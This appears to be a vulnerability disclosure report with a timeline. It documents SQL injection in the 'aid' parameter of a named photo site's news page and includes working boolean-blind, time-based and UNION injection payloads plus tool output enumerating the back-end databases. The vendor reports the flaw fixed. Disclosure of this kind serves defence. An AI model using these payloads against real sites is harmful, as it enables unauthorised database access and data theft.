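2015-05-26: Details reported to the vendor; awaiting vendor response
2015-05-26: Vendor has confirmed; details disclosed to the vendor only
2015-06-05: Details disclosed to core white hats and experts in relevant fields
2015-06-15: Details disclosed to regular white hats
2015-06-25: Details disclosed to intern white hats
2015-07-10: Details disclosed to the public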
www.fotomore.com/news/detail.php?aid=703
Test payloads:
aid=703%20AND%201=1
aid=703%20AND%201=2
---
Parameter: aid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: aid=703 AND 4142=4142

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: aid=703 AND (SELECT * FROM (SELECT(SLEEP(5)))mmAc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: aid=-4166 UNION ALL SELECT CONCAT(0x7170717071,0x49745648496665507151,0x71716b6b71),NULL,NULL,NULL--
---
[16:57:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0.12
available databases [8]:
[*] fotomoreblog
[*] fotomorecms
[*] information_schema
[*] iscdl
[*] iscfav
[*] istockchina
[*] keyword
[*] test

Database: fotomorecms
[78 tables]
~~
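Severity: High
Vulnerability Rank: 15
Confirmed: 2015-05-26 12:49
Thank you very much!
2015-05-26: Thank you very much for your attention! This vulnerability has been fixed!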